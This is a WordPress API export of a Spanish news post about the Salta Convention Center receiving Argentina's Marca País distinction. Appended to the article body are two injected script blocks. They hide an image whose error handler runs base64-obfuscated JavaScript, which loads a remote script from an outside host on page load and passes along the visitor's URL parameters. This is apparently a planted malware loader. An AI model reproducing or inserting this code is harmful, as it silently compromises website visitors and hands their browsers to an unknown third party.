{"id":2728,"date":"2023-06-14T10:03:42","date_gmt":"2023-06-14T13:03:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2728"},"modified":"2025-08-14T00:15:05","modified_gmt":"2025-08-14T03:15:05","slug":"el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2728","title":{"rendered":"El Centro de Convenciones Salta recibi\u00f3 la distinci\u00f3n de Marca Pa\u00eds"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#840638\"><em>Es una herramienta de posicionamiento internacional que se entrega a entidades tur\u00edsticas y productivas que responden a la construcci\u00f3n de la identidad de Argentina. Convocan a empresas e instituciones salte\u00f1as, p\u00fablicas o privadas, a postularse a este sello.<\/em><\/h4>\n\n\n\n<p>Con una trayectoria de 16 a\u00f1os desde su creaci\u00f3n y recibiendo la distinci\u00f3n Marca Pa\u00eds, el Centro de Convenciones Salta se consolida cada vez m\u00e1s como un icono en la Regi\u00f3n para el sector MICE y Turismo de Reuniones, que engloba la realizaci\u00f3n de congresos, ferias, exposiciones, eventos deportivos, viajes corporativos y de incentivo.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7514-el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais.jpg\" alt=\"El Centro de Convenciones Salta recibi\u00f3 la distinci\u00f3n de Marca Pa\u00eds\" width=\"360\" height=\"240\"\/><\/figure><\/div>\n\n\n<p><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7514-el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais.jpg\"><\/a>Por su compromiso en posicionar a la provincia de Salta dentro de la Argentina y en la regi\u00f3n de Am\u00e9rica Latina, como uno de los destinos m\u00e1s elegidos como sede de eventos internacionales, se lo distingue como entidad Marca Pa\u00eds. De esta manera se suma al Tren a las Nubes, Telef\u00e9rico San Bernardo y El Baqueano.<\/p>\n\n\n\n<p>Marca Pa\u00eds es una pol\u00edtica de Estado que posiciona al pa\u00eds en el contexto internacional mediante sus factores diferenciales, sus tradiciones, su cultura, sus productos, entre otros. Es una herramienta de gran utilidad para la construcci\u00f3n de identidad.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7515-el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais-20230614110403.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7515-el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais-20230614110403.jpg\" alt=\"El Centro de Convenciones Salta recibi\u00f3 la distinci\u00f3n de Marca Pa\u00eds\" width=\"307\" height=\"204\"\/><\/a><\/figure><\/div>\n\n\n<p>La entrega se realiz\u00f3 en el Centro de Convenciones Salta por parte de la directora nacional de Marca Pa\u00eds, Nadia Zanardi. Recibi\u00f3 el equipo del CCS a trav\u00e9s de su presidenta Andrea Pieve y de su vicepresidente Francisco Escudero. Tambi\u00e9n particip\u00f3 la secretaria de Turismo de Salta, Nadia Loza.<\/p>\n\n\n\n<p>Andrea Pieve indic\u00f3 que \u201ceste reconocimiento sirve para incrementar el esfuerzo por parte del equipo del Centro de Convenciones Salta colaborando con el posicionamiento tur\u00edstico de la provincia y de Argentina dentro del segmento MICE\u201d. En tanto, Nadia Loza felicit\u00f3 al equipo del CCS, \u201cestamos orgullosos de este Centro que es uno de los m\u00e1s modernos del pa\u00eds, son un ejemplo\u201d, indic\u00f3, adem\u00e1s de invitar a establecimientos p\u00fablicos y privados del sector tur\u00edstico a postularse para obtener esta licencia que representa al pa\u00eds en el mundo.<br>&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7516-el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais.jpg\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/7516-el-centro-de-convenciones-salta-recibio-la-distincion-de-marca-pais.jpg\" alt=\"El Centro de Convenciones Salta recibi\u00f3 la distinci\u00f3n de Marca Pa\u00eds\" width=\"326\" height=\"217\"\/><\/a><\/figure><\/div>\n\n\n<p>El acto se realiz\u00f3 en el marco de la presentaci\u00f3n a prestadores salte\u00f1os de las particularidades de \u201cMarca Pa\u00eds: una herramienta de posicionamiento internacional\u201d que realizaron el responsable del sector privado&nbsp;<strong>Guido Gattari<\/strong>&nbsp;y la directora nacional de Marca Pa\u00eds,&nbsp;<strong>Nadia Zanardi<\/strong>. El objetivo es interiorizar a potenciales licenciatarios del sector tur\u00edstico y productivo de la provincia.<\/p>\n\n\n\n<p>El Ministerio de Turismo y Deportes de la Naci\u00f3n pone a disposici\u00f3n una web para los interesados en conocer lo que significa Marca Pa\u00eds y las condiciones para postularse:\u00a0<a href=\"https:\/\/www.argentina.gob.ar\/turismoydeportes\/marca-pais%C2%A0\" target=\"_blank\" rel=\"noopener\" title=\"\">https:\/\/www.argentina.gob.ar\/turismoydeportes\/marca-pais\u00a0<\/a><\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Centro de Convenciones Salta recibi\u00f3 la distinci\u00f3n de Marca Pa\u00eds\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/8go86ssNRL4?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es una herramienta de posicionamiento internacional que se entrega a entidades tur\u00edsticas y productivas que responden a la construcci\u00f3n de la identidad de Argentina. Convocan a empresas e instituciones salte\u00f1as, p\u00fablicas o privadas, a postularse a este sello. Con una trayectoria de 16 a\u00f1os desde su creaci\u00f3n y recibiendo la distinci\u00f3n Marca Pa\u00eds, el Centro [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2729,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16],"tags":[],"class_list":{"0":"post-2728","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2728"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2728"}],"version-history":[{"count":4,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2728\/revisions"}],"predecessor-version":[{"id":7058,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2728\/revisions\/7058"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2729"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}